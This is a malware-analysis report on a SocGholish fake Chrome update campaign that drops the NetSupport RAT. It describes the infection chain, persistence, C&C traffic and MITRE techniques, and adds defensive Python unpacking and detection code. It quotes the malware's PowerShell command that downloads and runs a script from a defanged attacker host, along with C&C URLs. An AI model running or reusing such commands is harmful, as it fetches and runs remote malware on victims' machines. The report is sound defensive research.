NetSupport RAT Distributed Via SocGholish

New Drive-by Download Campaign Spying on Users

SocGholish is a JavaScript malware framework that has been active since 2017. The term “Soc” in “SocGholish” refers to the use of social engineering toolkits masquerading as software updates to deploy malware on a victim’s system.

This malware framework uses several social engineering themes that impersonate browser and program updates such as Chrome/Firefox, Flash Player, and Microsoft Teams.

Threat Actors (TAs) host a malicious website (the site displays content luring end-users with a supposedly critical browser update) that implements a drive-by-download mechanism, such as JavaScript code or Uniform Resource Locator (URL) redirections, to deliver an archive file containing malware.

Being infected with SocGholish may result in the deployment of malware such as the Cobalt Strike framework, ransomware, information stealers, RATs, etc.

The below figure depicts the infection chain used by the SocGholish framework.

Figure 1 – Infection chain of SocGholish

Technical Analysis

The infection chain begins once a user visits a compromised website containing injected HTML code that redirects them to a fake Chrome browser page, luring them into updating their Chrome application.

Once the user clicks the “Update” button on the fake page, an archive file named “Сhrome.Updаte.zip” is downloaded and saved in the “Downloads” folder.

The below figure shows a fake Chrome browser update page and the downloaded zip archive file.

Figure 2 – Fake update page of Chrome browser

The downloaded zip archive file contains a heavily obfuscated JavaScript file named “AutoUpdater.js”, as shown below.

Figure 3 – Obfuscated JavaScript file

Upon execution, the JavaScript file launches a PowerShell command that downloads and executes an additional PowerShell script from the remote server.

The JavaScript uses the following PowerShell command to download the new PowerShell script and invoke it using Invoke-Expression (iex):

  • "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex"

The new PowerShell script contains Base64-encoded streams which are decoded using the [System.Convert]::FromBase64String method and then gzip-decompressed through a stream opened in [System.IO.Compression.CompressionMode]::Decompress mode, as shown below.

Figure 4 – PowerShell Script to drop NetSupport RAT

The decoded and decompressed data contains the embedded payloads together with the code that drops the “NetSupport RAT” client, named “whost.exe”, and its supporting files under the %AppData% directory, after which “whost.exe” is executed. The below figure shows the NetSupport client application along with its associated files.
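The unpacking routine described above (Base64 literal, then gzip inflation) is easy to reproduce offline for triage. The following is an added analyst helper, not Cyble's code and not taken from the campaign's script: it pulls every FromBase64String(...) literal out of a PowerShell script, keeps those that carry gzip data, and inflates them. The embedded sample script and its placeholder payload are constructed here, not the real 15.ico stager.

```python
import base64
import gzip
import re

# Matches the decode step described above: a Base64 literal handed to
# [System.Convert]::FromBase64String(...). Quoting and spacing differ between
# samples, so the pattern is kept deliberately loose.
B64_CALL = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)", re.IGNORECASE
)

def extract_gzip_blobs(script_text: str) -> list[bytes]:
    """Return every Base64-decoded, gzip-inflated payload embedded in a PowerShell script.

    Literals that do not hold gzip data are skipped instead of raising, so one odd
    literal does not abort triage of the rest.
    """
    payloads = []
    for match in B64_CALL.finditer(script_text):
        raw = base64.b64decode(re.sub(r"\s+", "", match.group(1)), validate=True)
        if raw[:2] != b"\x1f\x8b":      # gzip magic bytes; anything else is not this stager's format
            continue
        payloads.append(gzip.decompress(raw))
    return payloads

# Constructed sample, not the real 15.ico script: a placeholder inner script,
# gzip-compressed and Base64-encoded the way the stager expects.
INNER_PLACEHOLDER = b"# placeholder stage content\nStart-Process \"$env:APPDATA\\placeholder.exe\"\n"
SAMPLE_B64 = base64.b64encode(gzip.compress(INNER_PLACEHOLDER)).decode()
SAMPLE_SCRIPT = f"""
$d  = [System.Convert]::FromBase64String('{SAMPLE_B64}')
$ms = New-Object System.IO.MemoryStream(,$d)
$gz = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
"""

if __name__ == "__main__":
    for i, blob in enumerate(extract_gzip_blobs(SAMPLE_SCRIPT)):
        print(f"[blob {i}] {len(blob)} bytes")
        print(blob.decode(errors="replace"))
```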

Figure 5 – NetSupport RAT malware package dropped under the %AppData% directory

After dropping the payload, the PowerShell script creates a run entry to ensure the executable “whost.exe” starts whenever the user logs onto the machine.

The below figure shows the registry key created to establish persistence of the NetSupport client “whost.exe”.

Figure 6 – Registry key created to establish persistence
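Two steps of this chain leave distinctive endpoint telemetry: the script-launched, hidden-window iwr | iex cradle quoted earlier, and the Run-key entry shown in Figure 6. The code below is an added detection example (not Cyble's and not from any product) that scores constructed process-creation and registry records against both; the Event field names and the Run value name "whost" are this example's assumptions.

```python
import re
from dataclasses import dataclass
# Heuristics for two steps of the chain: the script-launched, hidden-window download
# cradle and the Run-key persistence entry. Field names are this example's own,
# not a specific EDR or Sysmon schema.
DOWNLOAD_CRADLE = re.compile(
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod)\b.*\|\s*(iex|invoke-expression)\b",
    re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"\s-w(indowstyle)?\s+h(idden)?\b", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\AppData\\|%appdata%|\\Users\\[^\\]+\\", re.IGNORECASE)

@dataclass
class Event:
    kind: str           # "process" or "registry"
    parent: str = ""    # process events: parent image name
    image: str = ""     # process events: child image name
    cmdline: str = ""   # process events: full command line
    key: str = ""       # registry events: value path written
    data: str = ""      # registry events: value data written

def classify(ev: Event) -> list[str]:
    """Return the chain indicators an event matches; an empty list means nothing suspicious."""
    hits = []
    if ev.kind == "process" and ev.image.lower() == "powershell.exe":
        if ev.parent.lower() in SCRIPT_HOSTS:
            hits.append("script host spawned PowerShell")
        if DOWNLOAD_CRADLE.search(ev.cmdline):
            hits.append("download cradle piped to Invoke-Expression")
        if HIDDEN_WINDOW.search(ev.cmdline):
            hits.append("hidden window")
    elif ev.kind == "registry" and RUN_KEY.search(ev.key) and USER_WRITABLE.search(ev.data):
        hits.append("Run key pointing into a user-writable directory")
    return hits

# Constructed sample telemetry (not a capture from the campaign); the command line
# reuses the defanged cradle quoted in the report, the Run value name is assumed.
SAMPLE_EVENTS = [
    Event("process", parent="wscript.exe", image="powershell.exe",
          cmdline='powershell.exe -w h -c "iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex"'),
    Event("process", parent="explorer.exe", image="powershell.exe",
          cmdline="powershell.exe -File C:\\Scripts\\backup.ps1"),
    Event("registry", key="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\whost",
          data="C:\\Users\\victim\\AppData\\Roaming\\whost\\whost.exe"),
]
if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.kind, "->", classify(ev) or "no indicators")
```

A Run entry under HKLM pointing at a Program Files path scores nothing here, which is the intended distinction: the page's persistence lands in a per-user, user-writable location.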

NetSupport Manager RAT

NetSupport Manager is a commercially available Remote Administration Tool (RAT), typically used for legitimate purposes, that gives administrators remote access to users’ computers. However, the legitimate application can also be abused by TAs to gain unauthorized access to compromised systems.

Upon execution, the NetSupport RAT attempts to identify the victim’s geo-location by contacting the following URL:

  • hxxp://geo.netsupportsoftware[.]com/location/loca[.]asp

We also observed that the installed RAT sends victim information in an encrypted format with POST requests to the following Command-and-Control server URL:

  • hxxp://149.248.8[.]148/fakeurl[.]htm

The figure below shows the network communication established to send the victim’s information to the TA’s C&C server.

Figure 7 – Post-Infection C&C Traffic of NetSupport RAT

After compromising a victim machine, the TAs can perform several malicious activities such as monitoring the victim’s system, transferring files, launching applications, identifying the system location, remotely retrieving inventory and system information, etc.

Conclusion

Threat Actors use various techniques to deploy their malicious payloads onto victim systems. Over the course of our research, we observed TAs using fake browser updates (SocGholish) to deliver the NetSupport RAT.

When downloading files from the internet, users should confirm that the downloaded content originated from a legitimate source and not from a suspicious site. Software applications such as web browsers typically notify users about updates within the application itself and do not deliver updates via third-party websites.

Cyble Research & Intelligence Labs actively monitors new malicious campaigns and keeps our readers updated with our latest findings.

Our Recommendations

  • Refrain from opening untrusted links and email attachments without first verifying their authenticity.
  • Educate employees on protecting themselves from threats such as phishing and untrusted URLs.
  • Avoid downloading files from unknown websites.
  • Use strong passwords and enforce multi-factor authentication wherever possible.
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices.
  • Use a reputable antivirus and internet security software package on your connected devices, including PCs, laptops, and mobile devices.
  • Block URLs that could spread the malware, e.g., Torrent/Warez.
  • Monitor beacons at the network level to block data exfiltration by malware or TAs.
  • Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.

MITRE ATT&CK® Techniques

Tactic                 Technique ID   Technique Name
Initial Access         T1189          Drive-by Compromise
Execution              T1204          User Execution
                       T1059          JavaScript
                       T1059          PowerShell
Persistence            T1547          Registry Run Keys / Startup Folder
Privilege Escalation   T1574          DLL Side-Loading
                       T1055          Process Injection
Defence Evasion        T1027          Obfuscated Files or Information
                       T1497          Virtualization/Sandbox Evasion
                       T1140          Deobfuscate/Decode Files or Information
Discovery              T1082          System Information Discovery
Command and Control    T1219          Remote Access Software
                       T1105          Ingress Tool Transfer

Indicators of Compromise (IOCs) 
